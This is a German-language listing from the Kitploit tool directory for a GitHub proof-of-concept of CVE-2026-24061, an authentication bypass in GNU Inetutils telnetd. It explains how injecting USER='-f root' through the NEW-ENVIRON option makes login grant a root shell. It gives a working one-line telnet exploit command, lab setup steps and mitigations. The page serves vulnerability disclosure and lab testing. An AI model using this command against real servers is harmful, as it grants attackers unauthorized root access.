Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd Remote Authentication Bypass | Kitploit
Tools/GitHubGitHub/midox008/cve-2026-24061
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubmidox008/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd Remote Authentication Bypass

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24061

GNU Inetutils telnetd Remote Authentication Bypass

Ernsthaft, Telnet im Jahr 2026? Kommt schon Leute, es ist Zeit weiterzuziehen. SSH existiert seit 1995. 🤦

Beschreibung

Eine kritische Authentifizierungs-Bypass-Schwachstelle in GNU Inetutils telnetd, die Versionen 1.9.3 bis 2.7 betrifft.

Die Schwachstelle nutzt die NEW-ENVIRON-Telnet-Option aus, um bösartige Argumente in login(1) einzuschleusen. Durch das Setzen von USER=-f root über das Telnet-Protokoll kann ein Angreifer die Authentifizierung umgehen und ohne Anmeldedaten eine Root-Shell erhalten.

Betroffene Versionen

  • GNU Inetutils 1.9.3 - 2.7

Technische Details

Das Telnet-Protokoll unterstützt die NEW-ENVIRON-Option (RFC 1572), die es dem Client ermöglicht, Umgebungsvariablen an den Server zu senden. Der telnetd-Daemon übergibt die USER-Variable als Argument an login(1).

Tool herunterladen

Durch das Senden von USER=-f root wird der Wert wie folgt interpretiert:

  • -f-Flag: Authentifizierung überspringen (vertrauenswürdiger Host)
  • root: Zielbenutzer

Dies führt zur Ausführung von login -f root, wodurch sofortiger Root-Zugriff gewährt wird.

Der PoC erkennt eine erfolgreiche Ausnutzung, indem er nach IAC WILL ECHO (0xff 0xfb 0x01) sucht – dem Protokollsignal, das der Server sendet, wenn Shell-Zugriff gewährt wird.

Labor-Einrichtung

root@kitploit:~
# Vulnerablen telnetd-Container bauen und ausführen
docker compose up --build -d

# Exploit testen
go run poc.go 127.0.0.1 2323

Ausnutzung

root@kitploit:~
# Mit dem Go-PoC (mit interaktiver Shell)
go run poc.go <target> <port>

# Einfacher PoC mit standardmäßigem Telnet-Client
env USER='-f root' telnet -a <target> <port>

Gegenmaßnahmen

  • Hört auf, Telnet im Jahr 2026 zu verwenden, wirklich 🙏
  • Nutzt stattdessen SSH (es gibt es jetzt seit 31 Jahren, ich war '95 noch nicht mal geboren lol)
  • Upgrade auf eine gepatchte Version von GNU Inetutils
  • Telnet-Zugriff über Firewall-Regeln einschränken

Dateien

  • poc.go - Go-Exploit mit interaktiver Shell
  • Dockerfile - Vulnerabler telnetd-Container
  • docker-compose.yml - Labor-Orchestrierung

Referenzen

  • Advisory: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

Credits

  • LeakIX Research Team